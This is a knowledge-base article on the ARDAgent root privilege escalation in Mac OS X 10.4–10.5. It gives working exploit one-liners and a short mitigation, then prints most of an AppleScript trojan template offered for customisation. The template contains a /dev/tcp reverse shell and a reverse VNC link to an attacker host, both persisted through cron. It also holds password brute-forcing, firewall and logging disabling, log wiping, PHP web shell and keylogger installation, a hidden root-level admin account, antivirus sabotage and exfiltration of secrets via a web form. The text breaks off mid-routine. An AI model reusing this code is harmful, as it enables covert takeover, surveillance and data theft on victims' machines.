ARDAgent exploit

From MacShadows KB

Jump to: navigation, search

The ARDAgent exploit is a root privilege escalation exploit using AppleScript, taking advantage of lax permissions set upon the ARDAgent executable which is installed with Mac OS X 10.3 (when Apple Remote Desktop client has been installed) through Mac OS X 10.5 (both OS X 10.4 and 10.5 include Apple Remote Desktop client.) The ARDAgent vulnerability is currently not patched. Apple Remote Desktop need not be active, nor have ever been active for the exploit to succeed. When ARDAgent is told to 'do shell script' it is loaded even if it was not currently running. The ARDAgent executable is owned by the root user account and is setuid, meaning that it is possible for the ARDAgent process to be owned by root when launched. This is clearly not the intended behavior as it is generally launched as a process owned by the current user. The 'do shell script' command, when passed to ARDAgent will not always succeed nor will it always be run with root privileges. However, repeating the command eventually results in a successful exploit of the vulnerability.

Contents

Discovery

Initial posting by callmenames

The discovery of this exploit is accredited to members of the TheSharedForums. Subsequent its initial posting and confirmation in the thread, several members including lokin, callmenames, Oktane, andrewistheshit, and Wawl began a collaborative effort to create proof of concept software exploiting this vulnerability, one of which was the AppleScript Trojan Horse Template a.k.a. ""AppleScript.tht"" or AS.tht as dubbed by security profiteers.

Usage

AppleScript

--This is a comment, comments begin with two consecutive hyphens
--The next part below is a handler a.k.a. a subroutine
on ARDAgentize(command)
	try
		--Self explanatory?
		tell application "ARDAgent" to do shell script command
	on error
		--Kill ARDAgent if its already running as the user
		do shell script "kill $( ps -xcu ${USER} | grep ARDAgent | awk '{ print $2 }' ) ; exit 0"
		--restart this handler
		ARDAgentize(command)
	end try
end ARDAgentize

--This statement runs the handler and passes it the shell command "id"
ARDAgentize("id")

Bash script (Bourne Again Shell): Just paste this next line in Terminal then click back in the Terminal window and press return

function ARDA() { osascript -e 'tell app "ARDAgent" to do shell script "id"' || (kill $(ps -xcu ${USER} | grep ARDAgent | awk '{ print $2 }') ; ARDA ); } ; ARDA
Sample output of either the AppleScript or the shell command line:
"uid=0(root) gid=501(angel) egid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)"

The root account which has user ID zero (uid 0) generally has unrestricted access to processes, commands and files.

Solutions

Don't download and run software from untrusted sources and keep in mind that even software from trusted sources can accidentally destroy your data. Back up your data regularly, ideally to media which are not kept connected to the system and are read-only.

For the ARDAgent vulnerability itself, remove the setuid bit from the executables permissions.

Shell command:

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

You will be prompted for a password. This change will be undone by repairing permissions with Disk Utility or diskutil from the command line.

AppleScript Trojan Horse Template

The script source is shown below.

---------------------------------------------------------------------------
--AppleScript trojan horse template (incomplete, still in progress v0.6 posted)
---------------------------------------------------------------------------
--Written & tested with AppleScript 1.10.7 on Mac OS X 10.4.11 PPC


---------------------------------------------------------------------------
--Variables
--------------------
global masters_email_address, padlock_icon, software_update_icon, be_quiet, OSX_hashes, OSX_version_number_major, OSX_version_number_minor, OSX_version_number_mini, i_am_an_admin, i_have_root_access, my_username, my_password, my_Path, my_POSIX_folder, my_folder, my_name, launch_path, SystemLoginItems, hidden_admin_username, hidden_admin_password, hidden_admin_password_hash, ip_addresses, move_myself, my_resources, all_else_fails, phpshell_path, candidates_file, target_DDNS_username, target_DDNS_password, target_DDNS_id, target_DDNS_update_URL, masters_DDNS_address, accounts_file, debug, masters_netcat_port, masters_VNC_port, hashes_file, secret_file, key1, key2, webmail_command_line, the_message, the_title, webmail_success_response_term

--###############################################--
--########### HEY! You might want to change these? ###########--
--###############################################--
--These are the tr keys for fuxor and defuxor
set key1 to do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""

--The secret file filename
set secret_file to ".howdy"
set the_title to "Howdy"

--The following variables WILL be changed to the values found in the plist file if the plist file exists
--Which means if you change them within this script, delete the plist file
--If you use the plist file, don't bother changing the value in this script
--debug, hidden_admin_password, hidden_admin_username, masters_DDNS_address, masters_email_address, masters_netcat_port, masters_VNC_port, target_DDNS_id, target_DDNS_password, target_DDNS_update_URL, target_DDNS_username, webmail_command_line, webmail_success_response_term

set debug to true

--The name and password to use with the hidden admin account to be created
set hidden_admin_password to "a secret"
set hidden_admin_username to "nobodyd"

--For the reverse_shell
--Enter *your* Dynamic DNS address for the reverse-shell to connect to you
--Don't forget to update your DDNS record with your current IP if your IP is not static
set masters_DDNS_address to "localhost"

--Your email address for the outgoing mail to you
set masters_email_address to "emailname%40emaildomain.com"

--Whether or not to relocate the trojan away from where it was run
set move_myself to true

--Port number for connect-backs, reverse-shell etc.
set masters_netcat_port to "6880"
set masters_VNC_port to "6879"

--For the target's / victim's Dynamic DNS address so that you can get their IP address even if the outgoing email fails
set target_DDNS_id to "DDNS id"
set target_DDNS_password to "DDNS password"
set target_DDNS_username to "" --Leave this blank if you aren't using a DDNS service to track the target computer.
--You may need to adjust this for different DDNS service providers
set target_DDNS_update_URL to "http://www.sitelutions.com/dnsup?user=" & target_DDNS_username & "&pass=" & target_DDNS_password & "&id=" & target_DDNS_id & "&detectip=1"

set webmail_command_line to "curl -d 'hdnSendMail=sendNow&To=<<MASTERS_EMAIL_ADDRESS>>&CC=&BCC=&Subject=<<THE_TITLE>>&Message=<<THE_MESSAGE>>&btnSend=Send' www.employeesuggestions.com/form.asp 2>/dev/null | grep  '<<SUCCESS_RESPONSE_TERM>>'"
set webmail_success_response_term to "Your anonymous suggestion has been sent"

--###############################################--
--###### end of the 'HEY! You might want to change these?' stuff ######--
--###############################################--

--You probably shouldn't change these.
set padlock_icon to 2
set software_update_icon to 0
set be_quiet to true
set OSX_hashes to ""
set OSX_version_number_major to do shell script "sw_vers -productVersion | cut -d '.' -f 1"
set OSX_version_number_minor to do shell script "sw_vers -productVersion | cut -d '.' -f 2"
set OSX_version_number_mini to do shell script "sw_vers -productVersion | cut -d '.' -f 3"
set SystemLoginItems to ""
set i_am_an_admin to false
set i_have_root_access to false
set my_username to system attribute "USER"
set my_password to ""
set ip_addresses to ""
set my_Path to POSIX path of (path to me)
set my_POSIX_folder to (do shell script "dirname " & quoted form of my_Path) & "/"
set my_folder to (POSIX file my_POSIX_folder) --unused at present
set my_name to do shell script "basename \"" & my_Path & "\""
copy my_Path to launch_path
set my_resources to my_Path & "Contents/Resources/"
set phpshell_path to my_Path & "Contents/Resources/phpshell-2.1/"
set candidates_file to "/Users/Shared/SC Info/.candidates"
set accounts_file to "/Users/Shared/SC Info/.accounts"
set hashes_file to "/Users/Shared/SC Info/.hashes"
set all_else_fails to false

--Get the padlock icon
try
    --You could place a copy of the icns file(s) within your application bundle, then change this path.
    --Note that it will not work from Script Editor and will work from your finished app.
    set padlock_icon to POSIX file ("/System/Library/CoreServices/SecurityAgent.app/Contents/Resources/Security.icns" as text)
end try

--Get the Software Update icon
try
    set software_update_icon to POSIX file ("/System/Library/CoreServices/Software Update.app/Contents/Resources/Software Update.icns" as text)
end try


---------------------------------------------------------------------------
--Handlers
--------------------
on read_my_plist()
    --If my plist file exists, read settings from my plist file and use those instead of settings previously set in this script
    --If anyone knows of a method for indirect variable assignment in AppleScript, let me know! :)
    local tempvar
        if debug then log_event("read_my_plist")
    if (do shell script "[ -f " & quoted form of my_resources & "com.AStht.config.plist ] && echo 'true' || echo 'false'" as text) is "true" then
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config debug"
        if tempvar is "0" then set debug to false
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config hidden_admin_password"
        if tempvar is not "" then set hidden_admin_password to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config hidden_admin_username"
        if tempvar is not "" then set hidden_admin_username to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_DDNS_address"
        if tempvar is not "" then set masters_DDNS_address to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_email_address"
        if tempvar is not "" then set masters_email_address to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_netcat_port"
        if tempvar is not "" then set masters_netcat_port to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_VNC_port"
        if tempvar is not "" then set masters_VNC_port to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_id"
        if tempvar is not "" then set target_DDNS_id to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_password"
        if tempvar is not "" then set target_DDNS_password to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_update_URL"
        if tempvar is not "" then set target_DDNS_update_URL to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_username"
        if tempvar is not "" then set target_DDNS_username to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config webmail_success_response_term"
        if tempvar is not "" then set webmail_success_response_term to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config webmail_command_line"
        
        if tempvar is not "" then set webmail_command_line to tempvar
        else
                if debug then log_event("read_my_plist: plist not found")
    end if
end read_my_plist


on i_have_a_secret()
    --This routine gathers, sorts and uniques data from the various hidden files and creates a new secret_file,
    --then copies it to several locations which may be easily accessible.
    if debug then log_event("i_have_a_secret")
    try
        do shell script "cat " & quoted form of secret_file & " " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " | tr '\\r' '\\n' | sort -u > /var/tmp/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "[ -f /var/tmp/" & quoted form of secret_file & "] && mv /var/tmp/" & quoted form of secret_file & " ~/Public/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " ~/Sites/images/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "chmod 777 ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " ~/Sites/images/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
    end try
end i_have_a_secret

on log_event(append_this)
    local append_this
    do shell script ("echo \"$(date '+%y/%m/%d %H:%M:%S'), OS:" & OSX_version_number_major & "." & OSX_version_number_minor & "." & OSX_version_number_mini & ", AS:" & (version of AppleScript as text) & ", " & my_Path & " V:0.5 -- " & append_this & "\" >> /Users/Shared/.AStht.log")
end log_event


on Back_to_masters_VNC()
    if debug then log_event("back_to_masters_VNC")
    local Rvnc, the_process, crontent
    try
        do shell script "test -x /Users/Shared/.OSXvnc-server || cp \"" & my_resources & "Vine Server.app/Contents/Resources/OSXvnc-server\" /Users/Shared/.OSXvnc-server"
    end try
    set Rvnc to "#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
if [ -z \"$( lsof -i:" & masters_VNC_port & " | grep ESTABLISHED | grep OSXvnc )\" ]
then
    the_process=$( ps -auxwww | grep -i OSXvnc-server | grep -v grep | tr -s ' ' | cut -d ' ' -f 2 )
    [ \"x${the_process}\" != \"x\" ] && kill -9 \"${the_process}\"
fi
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec /Users/Shared/.OSXvnc-server -connectHost ${address} -connectPort " & masters_VNC_port & " &
exit 0"
    --Output the shell script to handle the OSXvnc-server reverse connection
    do shell script "echo " & quoted form of Rvnc & " > /Users/Shared/.Rvnc; chmod 777 /Users/Shared/.Rvnc"
    --Set a crontask to run the script every hour at 15 minutes past the hour
    set crontent to ((do shell script "crontab -l 2>/dev/null; exit 0") & return & "15" & tab & "*/1" & tab & "*" & tab & "*" & tab & "*" & tab & "/bin/bash /Users/Shared/.Rvnc 2>/dev/null")
    set crontent to do shell script "echo '" & crontent & "' | tr '\\r' '\\n' | sort -rnu > /var/tmp/cronappend"
    do shell script "crontab /var/tmp/cronappend"
    do shell script "rm /var/tmp/cronappend"
end Back_to_masters_VNC

on brute_user_accounts()
    --Attempt to brute-force passwords for the user accounts on this computer. This is not too speedy but if everything is else is done, I have nothing but time.
    if debug then log_event("brute_user_accounts")
    local the_users, the_passwords, the_username, the_password
    set the_users to {do shell script "dscl . -list /Users | while read username; do passwd=$( dscl . -read /Users/${username} passwd | cut -d ' ' -f 2 ); [ \"${passwd}\" != '*' ] && echo ${username}; done; exit 0"}
    set the_passwords to {"password" & return & "admin" & return & "1234" & return}
    try
        set the_passwords to {the_passwords & (do shell script "cat " & quoted form of candidates_file & " 2>/dev/null; exit 0")}
    end try
    set the_passwords to {do shell script "echo '" & the_passwords & return & the_users & return & return & "' | tr '\\r' '\\n' | sort -u "}
    repeat with the_username in the_users
        repeat with the_password in the_passwords
            try
                do shell script "expect -c 'spawn su " & the_username & "' -c 'expect Password: {send " & the_password & "\\n}' -c 'send id\\n' -c 'send exit\\n' -c 'expect eof' | grep uid"
                do shell script "echo " & the_username & ":" & the_password & " >> " & quoted form of accounts_file
                exit repeat
            end try
        end repeat
    end repeat
end brute_user_accounts

on reverse_shell()
    if debug then log_event("reverse_shell")
    local Rshell, the_process, crontent
    set Rshell to "#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec 6<>/dev/tcp/${address}/" & masters_netcat_port & " || exit 0
id >&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
cat <&6 | while read input
do
    $input >&6 2>&6
    echo -n \"${USER}@${HOSTNAME} > \" >&6
done
exit 0"
    --Output the shell script to handle the bash reverse-shell
    do shell script "echo " & quoted form of Rshell & " > /Users/Shared/.Rshell; chmod 777 /Users/Shared/.Rshell"
    --Set a crontask to run the script every hour at 5 minutes past the hour
    set crontent to ((do shell script "crontab -l 2>/dev/null; exit 0") & return & "5" & tab & "*/1" & tab & "*" & tab & "*" & tab & "*" & tab & "/bin/bash /Users/Shared/.Rshell 2>/dev/null")
    set crontent to do shell script "echo '" & crontent & "' | tr '\\r' '\\n' | sort -rnu > /var/tmp/cronappend"
    do shell script "crontab /var/tmp/cronappend"
    do shell script "rm /var/tmp/cronappend"
end reverse_shell

on its_smoky_in_here_lets_open_ports_in_the_firewall()
    --This handler is best run by root (but may disable the firewall in the preference file with only admin access, firewall won't be off until restart.)
    if debug then log_event("its_smoky_in_here_lets_open_ports_in_the_firewall")
    --A member of the admin group may already have write access to the file without the use of sudo. Try this first.
    try
        do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall state -bool false"
        do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall loggingenabled -int 0"
        do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall stealthenabled -int 0"
        do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall udpenabled -int 0"
    end try
    if i_have_root_access then
        try
            --for ipfw
            do shell script "/usr/bin/sudo /sbin/ipfw disable firewall" --stop ipfw if it is running
        end try
        --Modify the plist files to disable the firewall on startup
        --admin access is required, sudo actually isn't but I'll need it if I'm not an admin
        try
            --FirewallTool complains (in 10.4 at least) if the next four items aren't these exact types
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall state -bool false"
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall loggingenabled -int 0"
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall stealthenabled -int 0"
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall udpenabled -int 0"
            --for Leopard 10.5, won't hurt anything on prior systems
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 0"
        end try
    end if
end its_smoky_in_here_lets_open_ports_in_the_firewall

on throw_another_log_on_the_fire()
    if debug then log_event("throw_another_log_on_the_fire")
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --Call nothing_to_see_here to stop logging first.
    --Then this handler to clean the logs...
    try
        --Just delete utmp and wtmp for now, still need to write a cleaning routine
        do shell script "/usr/bin/sudo rm /var/run/utmp /var/run/utmpx /var/log/wtmp /var/log/wtmpx 2>/dev/null"
    end try
    try
        do shell script "exec /usr/bin/sudo bash <<< 'for log in /var/log/system.log /var/log/secure.log /var/log/ftp.log /var/log/asl.log /var/log/httpd/access_log /var/log/httpd/error_log /var/log/lastlog /Library/Logs/AppleFileService/AppleFileService*.log /Library/Logs/Console/*/console.log; do [ -f ${log} ] && { sed -e \"/[Ff][Rr][Oo][Mm]/d\" -e \"/client/d\" -e \"/[Ll]og[Kk]ext/d\" -e \"/" & my_username & "/d\" ${log} > ${log}.tmp && mv ${log}.tmp ${log}; }; done' "
    end try
end throw_another_log_on_the_fire

on nothing_to_see_here()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("nothing_to_see_here")
    try
        --Disable logging
        if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
            --For Tiger & Leopard
            do shell script "/usr/bin/sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.syslogd.plist"
        else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then
            --For Panther and Jaguar
            do shell script "/usr/bin/sudo killall syslogd"
        else
            --for Puma and Cheetah
            do shell script "myoutput=`/bin/ps -axww | grep syslogd | grep -v grep | sed -e 's/^ *//' -e 's/ .*//'`; [ -n \"${myoutput}\" ] && /usr/bin/sudo kill \"${myoutput}\""
        end if
    end try
    try
        --Stop system accounting
        do shell script "/usr/bin/sudo /usr/sbin/accton"
        do shell script "/usr/bin/sudo rm /var/account/acct"
    end try
    try
        --Change syslog.conf
        do shell script "/usr/bin/sudo mv /etc/syslog.conf /etc/syslog.conf.AStht; /usr/bin/sudo sed -e 's_/var/log/secure.log_/dev/null_' -e 's_/var/log/ftp.log_/dev/null_' /etc/syslog.conf.AStht > /var/tmp/syslog.conf && /usr/bin/sudo mv -f /var/tmp/syslog.conf /etc/syslog.conf && /usr/bin/sudo touch -r /etc/syslog.conf.AStht /etc/syslog.conf 2>/dev/null"
    end try
    try
        --Change logging settings in /Library/Preferences/com.apple.AppleFileServer.plist
        do shell script "exec /usr/bin/sudo bash <<< 'cp /Library/Preferences/com.apple.AppleFileServer.plist /Library/Preferences/com.apple.AppleFileServer.plist.AStht; defaults write /Library/Preferences/com.apple.AppleFileServer activityLog -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer activityLogPath -string /dev/null; defaults write /Library/Preferences/com.apple.AppleFileServer errorLogPath -string /dev/null; defaults write /Library/Preferences/com.apple.AppleFileServer admin31GetsSp -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer adminGetsSp -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer allowRootLogin -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer specialAdminPrivs -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer autoRestart -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer loggingAttributes \"<dict><key>logCreateDir</key><false/><key>logCreateFile</key><false/><key>logDelete</key><false/><key>logLogin</key><false/><key>logLogout</key><false/><key>logOpenFork</key><false/></dict>\"'"
    end try
end nothing_to_see_here

on install_phpshell()
    --This handler is best run by root (but can install to a user home folder without admin or root.)
    --PHPshell version 2.1 http://sourceforge.net/projects/phpshell
    if debug then log_event("install_phpshell")
    if OSX_version_number_minor as number ≥ 1 then
        --OS X 10.0 did not include PHP
        if i_have_root_access then
            --Place the PHPshell folder (unzipped) inside the Resources folder within your script bundle (or inside Script Editor if you aren't saving as an app)
            --Hopefully you remembered to add a user such as any of the following to PHPshell's config.php?
            --nobodyd  = "md5:54889c9:45caff28b8f9340ccb43f9f61d72b2a3"
            --nobodyd  = "sha1:527faf43:8a60cb4d7d16b6df77ebf01bcd6a8c98c6ab10d9"
            --nobodyd  = "a secret"
            try
                --Check if the file /Library/WebServer/Documents/.PS_Store/phpshell.php is already there
                --and if not, copy the contents of the PHPShell directory from within my application bundle
                --into /Library/WebServer/Documents/.PS_Store/
                do shell script "test -f /Library/WebServer/Documents/.PS_Store/phpshell.php || /usr/bin/sudo mkdir -p -m 777 /Library/WebServer/Documents/; /usr/bin/sudo cp -R " & quoted form of phpshell_path & " /Library/WebServer/Documents/.PS_Store/"
            end try
            try
                --Enable PHP4 support in /etc/httpd/httpd.conf
                do shell script "/usr/bin/sudo mv -f /etc/httpd/httpd.conf /etc/httpd/httpd.conf.AStht; /usr/bin/sudo sed -e 'sO# *LoadModule php4_module *libexec/httpd/libphp4.soOLoadModule php4_module libexec/httpd/libphp4.soO' -e 'sO# *AddType application/x-httpd-php .phpOAddType application/x-httpd-php .phpO' -e 'sO# *AddType application/x-httpd-php-source .phpsOAddType application/x-httpd-php-source .phpsO' -e 'sO# *AddModule mod_php4.cOAddModule mod_php4.cO' /etc/httpd/httpd.conf.AStht > /var/tmp/httpd.conf && /usr/bin/sudo mv -f /var/tmp/httpd.conf /etc/httpd/httpd.conf && /usr/bin/sudo touch -r /var/tmp/httpd.conf /etc/httpd/httpd.conf 2>/dev/null"
            end try
        else
            --If I don't have root access then I'll install PHPShell into /Library/WebServer/Documents, try ~/Sites
            do shell script "test -d ~/Sites/ && { test -f ~/Sites/images/.PS_Store/phpshell.php || mkdir -p ~/Sites/images 2>/dev/null && cp -R " & quoted form of phpshell_path & " ~/Sites/images/.PS_Store/; chgrp -Rf admin ~/Sites/; }"
        end if
    end if
    --You might also want to call enable_webserver()
end install_phpshell

on enable_webserver()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --This enables "Personal Web Sharing" and opens the web sharing ports in the firewall under Mac OS X 10.4 Tiger
    if debug then log_event("enable_webserver")
    try
        --Set "WEBSERVER=-YES-" in /etc/hostconfig
        do shell script "/usr/bin/sudo mv -f /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo sed -e 's/WEBSERVER=-NO-/WEBSERVER=-YES-/' /etc/hostconfig.AStht > /var/tmp/hostconfig && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
    end try
    try
        --Check /etc/hostconfig one more time and if "WEBSERVER=-YES-" isn't there, just append it.
        do shell script "grep 'WEBSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'WEBSERVER=-YES-' >> /etc/hostconfig  && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
    end try
    try
        do shell script "/usr/bin/sudo  launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist"
    on error
        do shell script "/usr/bin/sudo apachectl restart 2>/dev/null; exit 0"
    end try
    --/System/Library/LaunchDaemons org.apache.httpd.plist for leopard -- includes "SHAuthorizationRight" ?
end enable_webserver

on enable_Personal_File_Sharing()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("enable_Personal_File_Sharing")
    try
        --Set "AFPSERVER=-YES-" in /etc/hostconfig
        do shell script "/usr/bin/sudo mv -f /etc/hostconfig /etc/hostconfig.AStht2 && /usr/bin/sudo sed -e 's/AFPSERVER=-NO-/AFPSERVER=-YES-/' /etc/hostconfig.AStht2 > /var/tmp/hostconfig && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht2 /etc/hostconfig 2>/dev/null"
    end try
    try
        --Check /etc/hostconfig one more time and if "AFPSERVER=-YES-" isn't there, just append it.
        do shell script "grep 'AFPSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'AFPSERVER=-YES-' >> /etc/hostconfig  && /usr/bin/sudo touch -r /etc/hostconfig.AStht2 /etc/hostconfig 2>/dev/null"
    end try
    try
        do shell script "/usr/bin/sudo  launchctl load -w /System/Library/LaunchDaemons/com.apple.AppleFileServer.plist"
    on error
        do shell script "/usr/bin/sudo  /usr/sbin/AppleFileServer 2>/dev/null; exit 0"
    end try
end enable_Personal_File_Sharing

on install_and_activate_logKext()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --logKext version 2.2 http://logkext.googlecode.com/files/logKext.pkg.zip
    --This version of logKext is only for 10.4 and 10.5 and it is UB
    if debug then log_event("install_and_activate_logKext")
    if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
        try
            --Place a copy of logKext.pkg (unzipped) inside the Resources folder within your script bundle (or inside Script Editor if you aren't saving as an app)
            do shell script "[ -f /Library/Preferences/com.fsb.logKext ] && exit 0; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkext-1.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkext.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextclient.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextdaemon.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextkeygen.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextkeymap.pkg/\""
        on error error_message number error_number
            if debug then log_event("install_and_activate_logKext:ERROR #" & error_number & " " & error_message)
            --logKext wasn't installed, perhaps the path to the logKext package within my application bundle is incorrect?
        end try
        --Tell Spotlight not to index the files in /Library/Preferences
        do shell script "sudo defaults write /.Spotlight-V100/_exclusions EXCLUSIONS -array-add /Library/Preferences"
    end if
end install_and_activate_logKext

on there_are_no_osx_viruses_silly_wabbit()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --Tested with an older version of NAVLU. Hmm, not sure about file's write permissions...
    if debug then log_event("there_are_no_osx_viruses_silly_wabbit")
    try
        do shell script "if [ -f '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf' ]; then /usr/bin/sudo sed 's_://_://127.0.0.1/_'' '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf' > /var/tmp/lu.tmp; /usr/bin/sudo mv /var/tmp/lu.tmp '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf'"
    end try
    --Still to do, newer NAV, Virex, etc.
    --Perhaps modify the /etc/hosts file
end there_are_no_osx_viruses_silly_wabbit

on i_like_you_just_as_you_are()
    --Disables update checking for the current user ~/Library/Preferences/com.apple.scheduler.plist
    if debug then log_event("i_like_you_just_as_you_are")
    do shell script "softwareupdate --schedule off 2>/dev/null; exit 0"
end i_like_you_just_as_you_are

on quit
    --ignore any user attempts to quit this program
    if debug then log_event("quit handler")
end quit

on agent_86_reporting_for_duty_chief()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("agent_86_reporting_for_duty_chief")
    set hidden_admin_password_hash to do shell script "openssl passwd -crypt -salt xx '" & hidden_admin_password & "'"
    if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
        try
            --see if our user is already there
            do shell script "dscl . -read /Users/" & hidden_admin_username
        on error number 71 -- "read invalid path"
            --if not, then add our user.
            do shell script "/usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UniqueID 0; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' PrimaryGroupID 20; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' NFSHomeDirectory /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UserShell /bin/bash; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' RealName ''; /usr/bin/sudo dscl . -append /Groups/admin GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -append /Groups/wheel GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' authentication_authority 'basic'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' passwd " & hidden_admin_password_hash
        end try
    else --For Panther and prior
        try
            --see if our user is already there
            do shell script "niutil -readprop . /users/" & hidden_admin_username & " name"
        on error number 105 -- niutil can't open directory
            --if not, then add our user. niutil should use lowercase "/users/" or it will it create a second one named "/Users/" which won't actually work.
